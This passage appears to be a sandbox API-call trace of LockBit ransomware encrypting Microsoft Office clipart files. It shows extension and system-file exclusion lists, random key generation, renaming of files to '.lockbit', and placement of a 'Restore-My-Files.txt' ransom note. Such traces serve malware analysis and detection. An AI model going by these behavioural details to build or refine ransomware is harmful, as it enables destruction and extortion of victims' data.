nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0183.646] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.646] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.646] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.648] free (_Block=0x1fa2ed8) [0183.648] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143752.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.648] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.648] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.648] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6fe9600, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd6fe9600, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x1b7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143753.GIF", cAlternateFileName="")) returned 1 [0183.648] lstrcmpiW (lpString1=".", lpString2="J0143753.GIF") returned -1 [0183.648] lstrcmpiW (lpString1="..", lpString2="J0143753.GIF") returned -1 [0183.648] PathFindExtensionW (pszPath="J0143753.GIF") returned=".GIF" [0183.648] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.648] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.648] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.648] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.648] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.648] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.648] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.648] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.648] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.648] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.649] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.649] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.649] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.649] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.649] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.649] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.649] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.649] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.650] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.650] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143753.GIF") returned 1 [0183.650] lstrcmpiW (lpString1="ntldr", lpString2="J0143753.GIF") returned 1 [0183.650] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143753.GIF") returned 1 [0183.650] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143753.GIF") returned -1 [0183.650] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143753.GIF") returned -1 [0183.650] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143753.GIF") returned 1 [0183.650] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143753.GIF") returned -1 [0183.651] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.651] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF") returned=".GIF" [0183.651] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.651] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.651] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.651] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.651] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.651] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.651] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.652] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.652] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF.lockbit") returned 85 [0183.652] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143753.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0183.653] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.653] malloc (_Size=0x40068) returned 0x3f70048 [0183.653] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=7039) returned 1 [0183.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.654] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0183.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0183.655] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0183.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.660] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.660] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.661] free (_Block=0x1fa2ed8) [0183.661] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143753.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.661] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.662] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.662] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbf30900, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfbf30900, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x6ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143754.GIF", cAlternateFileName="")) returned 1 [0183.662] lstrcmpiW (lpString1=".", lpString2="J0143754.GIF") returned -1 [0183.662] lstrcmpiW (lpString1="..", lpString2="J0143754.GIF") returned -1 [0183.662] PathFindExtensionW (pszPath="J0143754.GIF") returned=".GIF" [0183.662] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.662] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.662] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.662] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.662] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.662] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.662] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.662] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.662] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.662] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.662] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.662] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.663] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.663] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.663] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.663] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.663] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.663] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.663] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.664] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.664] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143754.GIF") returned 1 [0183.664] lstrcmpiW (lpString1="ntldr", lpString2="J0143754.GIF") returned 1 [0183.664] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143754.GIF") returned 1 [0183.664] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143754.GIF") returned -1 [0183.664] lstrcmpiW (lpString1="autorun.inf", lpString2="J0143754.GIF") returned -1 [0183.664] lstrcmpiW (lpString1="thumbs.db", lpString2="J0143754.GIF") returned 1 [0183.665] lstrcmpiW (lpString1="iconcache.db", lpString2="J0143754.GIF") returned -1 [0183.665] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\") returned="" [0183.665] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF") returned=".GIF" [0183.665] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0183.665] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0183.665] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0183.665] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0183.666] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0183.666] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF.lockbit") returned 85 [0183.666] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\j0143754.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0183.668] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0183.668] malloc (_Size=0x40068) returned 0x3e70008 [0183.668] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=1709) returned 1 [0183.668] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0183.669] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0183.669] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0183.669] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0183.669] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0183.674] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.674] malloc (_Size=0xc0) returned 0x1fa2ed8 [0183.674] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0183.676] free (_Block=0x1fa2ed8) [0183.676] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\J0143754.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds") returned 1 [0183.676] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt") returned 85 [0183.676] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0183.676] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b07a00, ftCreationTime.dwHighDateTime=0x1bd9b11, ftLastAccessTime.dwLowDateTime=0x56406370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8b07a00, ftLastWriteTime.dwHighDateTime=0x1bd9b11, nFileSizeHigh=0x0, nFileSizeLow=0x69f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143758.GIF", cAlternateFileName="")) returned 1 [0183.676] lstrcmpiW (lpString1=".", lpString2="J0143758.GIF") returned -1 [0183.676] lstrcmpiW (lpString1="..", lpString2="J0143758.GIF") returned -1 [0183.676] PathFindExtensionW (pszPath="J0143758.GIF") returned=".GIF" [0183.676] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0183.676] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0183.677] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0183.677] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0183.678] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0183.678] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0183.678] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0183.678] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0183.678] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0183.679] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0183.679] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0183.679] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0183.679] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0143758.GIF") returned 1 [0183.679] lstrcmpiW (lpString1="ntldr", lpString2="J0143758.GIF") returned 1 [0183.679] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0143758.GIF") returned 1 [0183.679] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0143758.GIF") returned -1 [0183.679] lstrcmpiW 